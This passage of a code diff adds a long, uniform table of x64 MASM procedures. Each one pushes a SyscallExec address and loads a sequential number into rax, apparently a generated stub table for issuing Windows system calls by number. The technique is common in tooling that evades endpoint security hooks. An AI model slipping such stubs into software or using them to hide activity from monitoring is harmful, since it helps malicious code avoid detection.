+    Fnc00E3 ENDP
+
+    Fnc00E4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00e4h
+        ret
+        nop
+    Fnc00E4 ENDP
+
+    Fnc00E5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00e5h
+        ret
+        nop
+    Fnc00E5 ENDP
+
+    Fnc00E6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00e6h
+        ret
+        nop
+    Fnc00E6 ENDP
+
+    Fnc00E7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00e7h
+        ret
+        nop
+    Fnc00E7 ENDP
+
+    Fnc00E8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00e8h
+        ret
+        nop
+    Fnc00E8 ENDP
+
+    Fnc00E9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00e9h
+        ret
+        nop
+    Fnc00E9 ENDP
+
+    Fnc00EA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00eah
+        ret
+        nop
+    Fnc00EA ENDP
+
+    Fnc00EB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00ebh
+        ret
+        nop
+    Fnc00EB ENDP
+
+    Fnc00EC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00ech
+        ret
+        nop
+    Fnc00EC ENDP
+
+    Fnc00ED PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00edh
+        ret
+        nop
+    Fnc00ED ENDP
+
+    Fnc00EE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00eeh
+        ret
+        nop
+    Fnc00EE ENDP
+
+    Fnc00EF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00efh
+        ret
+        nop
+    Fnc00EF ENDP
+
+    Fnc00F0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00f0h
+        ret
+        nop
+    Fnc00F0 ENDP
+
+    Fnc00F1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00f1h
+        ret
+        nop
+    Fnc00F1 ENDP
+
+    Fnc00F2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00f2h
+        ret
+        nop
+    Fnc00F2 ENDP
+
+    Fnc00F3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00f3h
+        ret
+        nop
+    Fnc00F3 ENDP
+
+    Fnc00F4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00f4h
+        ret
+        nop
+    Fnc00F4 ENDP
+
+    Fnc00F5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00f5h
+        ret
+        nop
+    Fnc00F5 ENDP
+
+    Fnc00F6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00f6h
+        ret
+        nop
+    Fnc00F6 ENDP
+
+    Fnc00F7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00f7h
+        ret
+        nop
+    Fnc00F7 ENDP
+
+    Fnc00F8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00f8h
+        ret
+        nop
+    Fnc00F8 ENDP
+
+    Fnc00F9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00f9h
+        ret
+        nop
+    Fnc00F9 ENDP
+
+    Fnc00FA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00fah
+        ret
+        nop
+    Fnc00FA ENDP
+
+    Fnc00FB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00fbh
+        ret
+        nop
+    Fnc00FB ENDP
+
+    Fnc00FC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00fch
+        ret
+        nop
+    Fnc00FC ENDP
+
+    Fnc00FD PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00fdh
+        ret
+        nop
+    Fnc00FD ENDP
+
+    Fnc00FE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00feh
+        ret
+        nop
+    Fnc00FE ENDP
+
+    Fnc00FF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 00ffh
+        ret
+        nop
+    Fnc00FF ENDP
+
+    Fnc0100 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0100h
+        ret
+        nop
+    Fnc0100 ENDP
+
+    Fnc0101 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0101h
+        ret
+        nop
+    Fnc0101 ENDP
+
+    Fnc0102 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0102h
+        ret
+        nop
+    Fnc0102 ENDP
+
+    Fnc0103 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0103h
+        ret
+        nop
+    Fnc0103 ENDP
+
+    Fnc0104 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0104h
+        ret
+        nop
+    Fnc0104 ENDP
+
+    Fnc0105 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0105h
+        ret
+        nop
+    Fnc0105 ENDP
+
+    Fnc0106 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0106h
+        ret
+        nop
+    Fnc0106 ENDP
+
+    Fnc0107 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0107h
+        ret
+        nop
+    Fnc0107 ENDP
+
+    Fnc0108 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0108h
+        ret
+        nop
+    Fnc0108 ENDP
+
+    Fnc0109 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0109h
+        ret
+        nop
+    Fnc0109 ENDP
+
+    Fnc010A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 010ah
+        ret
+        nop
+    Fnc010A ENDP
+
+    Fnc010B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 010bh
+        ret
+        nop
+    Fnc010B ENDP
+
+    Fnc010C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 010ch
+        ret
+        nop
+    Fnc010C ENDP
+
+    Fnc010D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 010dh
+        ret
+        nop
+    Fnc010D ENDP
+
+    Fnc010E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 010eh
+        ret
+        nop
+    Fnc010E ENDP
+
+    Fnc010F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 010fh
+        ret
+        nop
+    Fnc010F ENDP
+
+    Fnc0110 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0110h
+        ret
+        nop
+    Fnc0110 ENDP
+
+    Fnc0111 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0111h
+        ret
+        nop
+    Fnc0111 ENDP
+
+    Fnc0112 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0112h
+        ret
+        nop
+    Fnc0112 ENDP
+
+    Fnc0113 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0113h
+        ret
+        nop
+    Fnc0113 ENDP
+
+    Fnc0114 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0114h
+        ret
+        nop
+    Fnc0114 ENDP
+
+    Fnc0115 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0115h
+        ret
+        nop
+    Fnc0115 ENDP
+
+    Fnc0116 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0116h
+        ret
+        nop
+    Fnc0116 ENDP
+
+    Fnc0117 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0117h
+        ret
+        nop
+    Fnc0117 ENDP
+
+    Fnc0118 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0118h
+        ret
+        nop
+    Fnc0118 ENDP
+
+    Fnc0119 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0119h
+        ret
+        nop
+    Fnc0119 ENDP
+
+    Fnc011A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 011ah
+        ret
+        nop
+    Fnc011A ENDP
+
+    Fnc011B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 011bh
+        ret
+        nop
+    Fnc011B ENDP
+
+    Fnc011C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 011ch
+        ret
+        nop
+    Fnc011C ENDP
+
+    Fnc011D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 011dh
+        ret
+        nop
+    Fnc011D ENDP
+
+    Fnc011E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 011eh
+        ret
+        nop
+    Fnc011E ENDP
+
+    Fnc011F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 011fh
+        ret
+        nop
+    Fnc011F ENDP
+
+    Fnc0120 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0120h
+        ret
+        nop
+    Fnc0120 ENDP
+
+    Fnc0121 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0121h
+        ret
+        nop
+    Fnc0121 ENDP
+
+    Fnc0122 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0122h
+        ret
+        nop
+    Fnc0122 ENDP
+
+    Fnc0123 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0123h
+        ret
+        nop
+    Fnc0123 ENDP
+
+    Fnc0124 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0124h
+        ret
+        nop
+    Fnc0124 ENDP
+
+    Fnc0125 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0125h
+        ret
+        nop
+    Fnc0125 ENDP
+
+    Fnc0126 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0126h
+        ret
+        nop
+    Fnc0126 ENDP
+
+    Fnc0127 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0127h
+        ret
+        nop
+    Fnc0127 ENDP
+
+    Fnc0128 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0128h
+        ret
+        nop
+    Fnc0128 ENDP
+
+    Fnc0129 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0129h
+        ret
+        nop
+    Fnc0129 ENDP
+
+    Fnc012A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 012ah
+        ret
+        nop
+    Fnc012A ENDP
+
+    Fnc012B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 012bh
+        ret
+        nop
+    Fnc012B ENDP
+
+    Fnc012C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 012ch
+        ret
+        nop
+    Fnc012C ENDP
+
+    Fnc012D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 012dh
+        ret
+        nop
+    Fnc012D ENDP
+
+    Fnc012E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 012eh
+        ret
+        nop
+    Fnc012E ENDP
+
+    Fnc012F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 012fh
+        ret
+        nop
+    Fnc012F ENDP
+
+    Fnc0130 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0130h
+        ret
+        nop
+    Fnc0130 ENDP
+
+    Fnc0131 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0131h
+        ret
+        nop
+    Fnc0131 ENDP
+
+    Fnc0132 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0132h
+        ret
+        nop
+    Fnc0132 ENDP
+
+    Fnc0133 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0133h
+        ret
+        nop
+    Fnc0133 ENDP
+
+    Fnc0134 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0134h
+        ret
+        nop
+    Fnc0134 ENDP
+
+    Fnc0135 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0135h
+        ret
+        nop
+    Fnc0135 ENDP
+
+    Fnc0136 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0136h
+        ret
+        nop
+    Fnc0136 ENDP
+
+    Fnc0137 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0137h
+        ret
+        nop
+    Fnc0137 ENDP
+
+    Fnc0138 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0138h
+        ret
+        nop
+    Fnc0138 ENDP
+
+    Fnc0139 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0139h
+        ret
+        nop
+    Fnc0139 ENDP
+
+    Fnc013A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 013ah
+        ret
+        nop
+    Fnc013A ENDP
+
+    Fnc013B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 013bh
+        ret
+        nop
+    Fnc013B ENDP
+
+    Fnc013C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 013ch
+        ret
+        nop
+    Fnc013C ENDP
+
+    Fnc013D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 013dh
+        ret
+        nop
+    Fnc013D ENDP
+
+    Fnc013E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 013eh
+        ret
+        nop
+    Fnc013E ENDP
+
+    Fnc013F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 013fh
+        ret
+        nop
+    Fnc013F ENDP
+
+    Fnc0140 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0140h
+        ret
+        nop
+    Fnc0140 ENDP
+
+    Fnc0141 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0141h
+        ret
+        nop
+    Fnc0141 ENDP
+
+    Fnc0142 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0142h
+        ret
+        nop
+    Fnc0142 ENDP
+
+    Fnc0143 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0143h
+        ret
+        nop
+    Fnc0143 ENDP
+
+    Fnc0144 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0144h
+        ret
+        nop
+    Fnc0144 ENDP
+
+    Fnc0145 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0145h
+        ret
+        nop
+    Fnc0145 ENDP
+
+    Fnc0146 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0146h
+        ret
+        nop
+    Fnc0146 ENDP
+
+    Fnc0147 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0147h
+        ret
+        nop
+    Fnc0147 ENDP
+
+    Fnc0148 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0148h
+        ret
+        nop
+    Fnc0148 ENDP
+
+    Fnc0149 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0149h
+        ret
+        nop
+    Fnc0149 ENDP
+
+    Fnc014A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 014ah
+        ret
+        nop
+    Fnc014A ENDP
+
+    Fnc014B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 014bh
+        ret
+        nop
+    Fnc014B ENDP
+
+    Fnc014C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 014ch
+        ret
+        nop
+    Fnc014C ENDP
+
+    Fnc014D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 014dh
+        ret
+        nop
+    Fnc014D ENDP
+
+    Fnc014E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 014eh
+        ret
+        nop
+    Fnc014E ENDP
+
+    Fnc014F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 014fh
+        ret
+        nop
+    Fnc014F ENDP
+
+    Fnc0150 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0150h
+        ret
+        nop
+    Fnc0150 ENDP
+
+    Fnc0151 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0151h
+        ret
+        nop
+    Fnc0151 ENDP
+
+    Fnc0152 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0152h
+        ret
+        nop
+    Fnc0152 ENDP
+
+    Fnc0153 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0153h
+        ret
+        nop
+    Fnc0153 ENDP
+
+    Fnc0154 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0154h
+        ret
+        nop
+    Fnc0154 ENDP
+
+    Fnc0155 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0155h
+        ret
+        nop
+    Fnc0155 ENDP
+
+    Fnc0156 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0156h
+        ret
+        nop
+    Fnc0156 ENDP
+
+    Fnc0157 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0157h
+        ret
+        nop
+    Fnc0157 ENDP
+
+    Fnc0158 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0158h
+        ret
+        nop
+    Fnc0158 ENDP
+
+    Fnc0159 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0159h
+        ret
+        nop
+    Fnc0159 ENDP
+
+    Fnc015A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 015ah
+        ret
+        nop
+    Fnc015A ENDP
+
+    Fnc015B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 015bh
+        ret
+        nop
+    Fnc015B ENDP
+
+    Fnc015C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 015ch
+        ret
+        nop
+    Fnc015C ENDP
+
+    Fnc015D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 015dh
+        ret
+        nop
+    Fnc015D ENDP
+
+    Fnc015E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 015eh
+        ret
+        nop
+    Fnc015E ENDP
+
+    Fnc015F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 015fh
+        ret
+        nop
+    Fnc015F ENDP
+
+    Fnc0160 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0160h
+        ret
+        nop
+    Fnc0160 ENDP
+
+    Fnc0161 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0161h
+        ret
+        nop
+    Fnc0161 ENDP
+
+    Fnc0162 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0162h
+        ret
+        nop
+    Fnc0162 ENDP
+
+    Fnc0163 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0163h
+        ret
+        nop
+    Fnc0163 ENDP
+
+    Fnc0164 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0164h
+        ret
+        nop
+    Fnc0164 ENDP
+
+    Fnc0165 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0165h
+        ret
+        nop
+    Fnc0165 ENDP
+
+    Fnc0166 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0166h
+        ret
+        nop
+    Fnc0166 ENDP
+
+    Fnc0167 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0167h
+        ret
+        nop
+    Fnc0167 ENDP
+
+    Fnc0168 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0168h
+        ret
+        nop
+    Fnc0168 ENDP
+
+    Fnc0169 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0169h
+        ret
+        nop
+    Fnc0169 ENDP
+
+    Fnc016A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 016ah
+        ret
+        nop
+    Fnc016A ENDP
+
+    Fnc016B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 016bh
+        ret
+        nop
+    Fnc016B ENDP
+
+    Fnc016C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 016ch
+        ret
+        nop
+    Fnc016C ENDP
+
+    Fnc016D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 016dh
+        ret
+        nop
+    Fnc016D ENDP
+
+    Fnc016E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 016eh
+        ret
+        nop
+    Fnc016E ENDP
+
+    Fnc016F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 016fh
+        ret
+        nop
+    Fnc016F ENDP
+
+    Fnc0170 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0170h
+        ret
+        nop
+    Fnc0170 ENDP
+
+    Fnc0171 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0171h
+        ret
+        nop
+    Fnc0171 ENDP
+
+    Fnc0172 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0172h
+        ret
+        nop
+    Fnc0172 ENDP
+
+    Fnc0173 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0173h
+        ret
+        nop
+    Fnc0173 ENDP
+
+    Fnc0174 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0174h
+        ret
+        nop
+    Fnc0174 ENDP
+
+    Fnc0175 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0175h
+        ret
+        nop
+    Fnc0175 ENDP
+
+    Fnc0176 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0176h
+        ret
+        nop
+    Fnc0176 ENDP
+
+    Fnc0177 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0177h
+        ret
+        nop
+    Fnc0177 ENDP
+
+    Fnc0178 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0178h
+        ret
+        nop
+    Fnc0178 ENDP
+
+    Fnc0179 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0179h
+        ret
+        nop
+    Fnc0179 ENDP
+
+    Fnc017A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 017ah
+        ret
+        nop
+    Fnc017A ENDP
+
+    Fnc017B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 017bh
+        ret
+        nop
+    Fnc017B ENDP
+
+    Fnc017C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 017ch
+        ret
+        nop
+    Fnc017C ENDP
+
+    Fnc017D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 017dh
+        ret
+        nop
+    Fnc017D ENDP
+
+    Fnc017E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 017eh
+        ret
+        nop
+    Fnc017E ENDP
+
+    Fnc017F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 017fh
+        ret
+        nop
+    Fnc017F ENDP
+
+    Fnc0180 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0180h
+        ret
+        nop
+    Fnc0180 ENDP
+
+    Fnc0181 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0181h
+        ret
+        nop
+    Fnc0181 ENDP
+
+    Fnc0182 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0182h
+        ret
+        nop
+    Fnc0182 ENDP
+
+    Fnc0183 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0183h
+        ret
+        nop
+    Fnc0183 ENDP
+
+    Fnc0184 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0184h
+        ret
+        nop
+    Fnc0184 ENDP
+
+    Fnc0185 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0185h
+        ret
+        nop
+    Fnc0185 ENDP
+
+    Fnc0186 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0186h
+        ret
+        nop
+    Fnc0186 ENDP
+
+    Fnc0187 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0187h
+        ret
+        nop
+    Fnc0187 ENDP
+
+    Fnc0188 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0188h
+        ret
+        nop
+    Fnc0188 ENDP
+
+    Fnc0189 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0189h
+        ret
+        nop
+    Fnc0189 ENDP
+
+    Fnc018A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 018ah
+        ret
+        nop
+    Fnc018A ENDP
+
+    Fnc018B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 018bh
+        ret
+        nop
+    Fnc018B ENDP
+
+    Fnc018C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 018ch
+        ret
+        nop
+    Fnc018C ENDP
+
+    Fnc018D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 018dh
+        ret
+        nop
+    Fnc018D ENDP
+
+    Fnc018E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 018eh
+        ret
+        nop
+    Fnc018E ENDP
+
+    Fnc018F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 018fh
+        ret
+        nop
+    Fnc018F ENDP
+
+    Fnc0190 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0190h
+        ret
+        nop
+    Fnc0190 ENDP
+
+    Fnc0191 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0191h
+        ret
+        nop
+    Fnc0191 ENDP
+
+    Fnc0192 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0192h
+        ret
+        nop
+    Fnc0192 ENDP
+
+    Fnc0193 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0193h
+        ret
+        nop
+    Fnc0193 ENDP
+
+    Fnc0194 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0194h
+        ret
+        nop
+    Fnc0194 ENDP
+
+    Fnc0195 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0195h
+        ret
+        nop
+    Fnc0195 ENDP
+
+    Fnc0196 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0196h
+        ret
+        nop
+    Fnc0196 ENDP
+
+    Fnc0197 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0197h
+        ret
+        nop
+    Fnc0197 ENDP
+
+    Fnc0198 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0198h
+        ret
+        nop
+    Fnc0198 ENDP
+
+    Fnc0199 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 0199h
+        ret
+        nop
+    Fnc0199 ENDP
+
+    Fnc019A PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 019ah
+        ret
+        nop
+    Fnc019A ENDP
+
+    Fnc019B PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 019bh
+        ret
+        nop
+    Fnc019B ENDP
+
+    Fnc019C PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 019ch
+        ret
+        nop
+    Fnc019C ENDP
+
+    Fnc019D PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 019dh
+        ret
+        nop
+    Fnc019D ENDP
+
+    Fnc019E PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 019eh
+        ret
+        nop
+    Fnc019E ENDP
+
+    Fnc019F PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 019fh
+        ret
+        nop
+    Fnc019F ENDP
+
+    Fnc01A0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01a0h
+        ret
+        nop
+    Fnc01A0 ENDP
+
+    Fnc01A1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01a1h
+        ret
+        nop
+    Fnc01A1 ENDP
+
+    Fnc01A2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01a2h
+        ret
+        nop
+    Fnc01A2 ENDP
+
+    Fnc01A3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01a3h
+        ret
+        nop
+    Fnc01A3 ENDP
+
+    Fnc01A4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01a4h
+        ret
+        nop
+    Fnc01A4 ENDP
+
+    Fnc01A5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01a5h
+        ret
+        nop
+    Fnc01A5 ENDP
+
+    Fnc01A6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01a6h
+        ret
+        nop
+    Fnc01A6 ENDP
+
+    Fnc01A7 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01a7h
+        ret
+        nop
+    Fnc01A7 ENDP
+
+    Fnc01A8 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01a8h
+        ret
+        nop
+    Fnc01A8 ENDP
+
+    Fnc01A9 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01a9h
+        ret
+        nop
+    Fnc01A9 ENDP
+
+    Fnc01AA PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01aah
+        ret
+        nop
+    Fnc01AA ENDP
+
+    Fnc01AB PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01abh
+        ret
+        nop
+    Fnc01AB ENDP
+
+    Fnc01AC PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01ach
+        ret
+        nop
+    Fnc01AC ENDP
+
+    Fnc01AD PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01adh
+        ret
+        nop
+    Fnc01AD ENDP
+
+    Fnc01AE PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01aeh
+        ret
+        nop
+    Fnc01AE ENDP
+
+    Fnc01AF PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01afh
+        ret
+        nop
+    Fnc01AF ENDP
+
+    Fnc01B0 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01b0h
+        ret
+        nop
+    Fnc01B0 ENDP
+
+    Fnc01B1 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01b1h
+        ret
+        nop
+    Fnc01B1 ENDP
+
+    Fnc01B2 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01b2h
+        ret
+        nop
+    Fnc01B2 ENDP
+
+    Fnc01B3 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01b3h
+        ret
+        nop
+    Fnc01B3 ENDP
+
+    Fnc01B4 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01b4h
+        ret
+        nop
+    Fnc01B4 ENDP
+
+    Fnc01B5 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01b5h
+        ret
+        nop
+    Fnc01B5 ENDP
+
+    Fnc01B6 PROC
+        mov rax, SyscallExec
+        push rax
+        mov rax, 01b6h
+        ret
+        nop
+    Fnc01B6 ENDP
+
+    Fnc01B7 PROC
